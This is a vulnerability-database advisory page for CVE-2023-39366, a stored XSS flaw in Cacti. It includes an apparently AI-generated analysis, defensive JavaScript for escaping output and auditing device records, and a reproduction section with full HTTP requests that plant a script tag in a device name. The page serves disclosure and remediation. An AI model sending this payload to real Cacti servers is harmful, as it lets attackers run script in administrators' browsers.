VYPR
Unrated severity · NVD Advisory · Published Sep 5, 2023 · Updated Feb 13, 2025

Stored Cross-site Scripting in data_sources.php through Device-Name in 'select' input in Cacti

CVE-2023-39366

Description

Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a Stored Cross-Site-Scripting (XSS) vulnerability that allows an authenticated user to poison data stored in the _cacti_'s database. These data will be viewed by administrative _cacti_ accounts and execute JavaScript code in the victim's browser at view-time. The data_sources.php script displays the data source management information (e.g. data source path, polling configuration etc.) for different data visualizations of the _cacti_ app. CENSUS found that an adversary that is able to configure a malicious Device name can deploy a stored XSS attack against any user of the same (or broader) privileges. A user that possesses the _General Administration>Sites/Devices/Data_ permissions can configure the device names in _cacti_. This configuration occurs through http:///cacti/host.php, while the rendered malicious payload is exhibited at http:///cacti/data_sources.php. This vulnerability has been addressed in version 1.2.25. Users are advised to upgrade. Users unable to update should manually filter HTML output.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products: 13

Vulnerability mechanics

Root cause

"The application does not properly sanitize user-supplied device names, allowing them to be injected as JavaScript."

Attack vector

An authenticated user with 'General Administration>Sites/Devices/Data' permissions can configure a malicious device name via `host.php` [ref_id=1]. This malicious payload is then rendered on the `data_sources.php` page when viewed by an administrative user [ref_id=1]. The JavaScript code executes in the victim's browser at view-time, as the payload is stored in the database and displayed without proper sanitization [ref_id=1].

Affected code

The vulnerability exists in the `data_sources.php` script, specifically where the 'host_id' field is processed and displayed. The `draw_edit_form` function in `html_form.php` is involved in rendering the data, and the `$.fn.textBoxWidth` function in `layout.js` is called, which can execute the injected script [ref_id=1].

What the fix does

The advisory recommends either treating user-supplied information as plain text or escaping it using HTML entities to prevent it from being interpreted as code. For client-side JavaScript, it advises against appending user-controlled input directly into the DOM [ref_id=1]. Users unable to upgrade are advised to manually filter HTML output.
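The two mitigations named above, shown as an added JavaScript example (this is not Cacti's own code): an HTML-entity escaper equivalent to PHP's htmlspecialchars with ENT_QUOTES, the string-concatenation pattern that lets a stored device name become live markup beside its escaped form, and a DOM-building alternative that sets textContent instead of injecting markup. The function names and the `<option>` rendering are assumptions for illustration; the sample device name is constructed in the shape of the advisory's payload.

```javascript
// Added example, not Cacti's code. Function names are hypothetical.

// Escape the five HTML metacharacters; equivalent to PHP's
// htmlspecialchars($s, ENT_QUOTES), which is what "escaping using HTML
// entities" means on the server side.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')   // must run first so later entities are not double-escaped
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// Vulnerable pattern: the stored device name is concatenated straight into
// markup that is later handed to innerHTML / jQuery .html(). Any tags in the
// name are parsed as tags.
function renderOptionUnsafe(hostId, deviceName) {
  return '<option value="' + hostId + '">' + deviceName + '</option>';
}

// Hardened pattern: every untrusted field is escaped before it touches markup,
// so the browser shows the name as text.
function renderOptionSafe(hostId, deviceName) {
  return '<option value="' + escapeHtml(hostId) + '">' + escapeHtml(deviceName) + '</option>';
}

// Client-side alternative that never builds markup from user input: create the
// node and assign textContent. `doc` is any DOM Document (a browser document,
// or jsdom in a test harness).
function appendOptionSafe(doc, selectEl, hostId, deviceName) {
  const opt = doc.createElement('option');
  opt.value = String(hostId);
  opt.textContent = deviceName;   // assigned as text, never parsed as HTML
  selectEl.appendChild(opt);
  return opt;
}

// Constructed sample in the shape of the advisory's PoC device name.
const SAMPLE_NAME = "Local Linux Machine<script>alert('host.php')</script>";
```

The unsafe renderer emits a literal `<script>` element; the safe one emits `&lt;script&gt;`, which the HTML parser treats as character data. Escape at the point of output rather than at storage time, so the same stored value is safe in every page that displays it.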

Preconditions

  • The attacker must be an authenticated user with 'General Administration>Sites/Devices/Data' permissions.
  • The victim must be a user with the same or broader privileges, including administrative accounts.

Reproduction

POST /cacti/host.php?header=false HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 885
Origin: http://<HOST>
Connection: close
Cookie: Cacti=<COOKIE>

__csrf_magic=<CSRF TOKEN>&description=Local+Linux+Machine%3Cscript%3Ealert('host.php')%3C%2Fscript%3E&hostname=localhost=&poller_id=1&site_id=0&host_template_id=7&device_threads=1&snmp_version=0&snmp_community=public&snmp_security_level=authPriv&snmp_auth_protocol=MD5&snmp_username=&snmp_password=&snmp_password_confirm=&snmp_priv_protocol=DES&snmp_priv_passphrase=&snmp_priv_passphrase_confirm=&snmp_context=&snmp_engine_id=&snmp_port=161&snmp_timeout=500&max_oids=10&bulk_walk_size=-1&availability_method=0&ping_method=1&ping_port=23&ping_timeout=400&ping_retries=1&notes=Initial+Cacti+Device&external_id=&id=1&save_component_host=1&graph_template_id=5&reindex_radio_1=on&reindex_radio_16=on&snmp_query_id=3&reindex_method=0&action=save

GET /cacti/data_sources.php?action=ds_edit&id=8&debug=1 HTTP/1.1
Host: <HOST>
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: <COOKIE>
Connection: close

[ref_id=1]
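Because the payload is stored, upgrading to 1.2.25 fixes the rendering but leaves any already-poisoned device records in the database. The following added audit helper (not Cacti's code) scans exported device rows for values that an unpatched data_sources.php would have rendered as live markup, so they can be reviewed and renamed. The rows are constructed samples; the column names `id`, `description` and `hostname` are assumptions for illustration, and the first row mirrors the description used in the reproduction above.

```javascript
// Added audit helper, not Cacti's code. Column names are assumptions.

// Constructed sample rows shaped like an export of the device table.
const SAMPLE_HOSTS = [
  { id: 1, description: "Local Linux Machine<script>alert('host.php')</script>", hostname: 'localhost' },
  { id: 2, description: 'core-sw01', hostname: '10.0.0.1' },
  { id: 3, description: 'edge <b>router</b>', hostname: 'edge.example' },   // benign tag, still markup
  { id: 4, description: 'A&B printers', hostname: 'print.example' },        // a bare '&' is not a tag
  { id: 5, description: 'backup', hostname: 'backup.example' },
  { id: 6, description: 'alarm if temp < 40C', hostname: 'sensor.example' }, // '<' followed by space is text
];

// A '<' only opens markup when followed by a tag name, '/', '!' or '?'.
// Matching on that, rather than on any '<', avoids flagging ordinary
// comparisons in free-text fields (row 6).
const TAG_START = /<[a-zA-Z\/!?]/;

// Return one hit per (row, field) whose value could be parsed as HTML.
function findMarkupInHosts(rows, fields = ['description', 'hostname']) {
  const hits = [];
  for (const row of rows) {
    for (const field of fields) {
      const value = row[field];
      if (typeof value === 'string' && TAG_START.test(value)) {
        hits.push({ id: row.id, field, value });
      }
    }
  }
  return hits;
}

// Convenience: just the ids of affected rows, for a ticket or a follow-up query.
function affectedHostIds(rows) {
  return [...new Set(findMarkupInHosts(rows).map(h => h.id))];
}
```

Flagged rows should be inspected and renamed by an administrator; the `id` ties back to the record edited through host.php. Correlating the ids with the web server's access log for POSTs to host.php narrows down which account stored the value.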

Generated on Jun 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 5

News mentions: 0 (no linked articles in our index yet)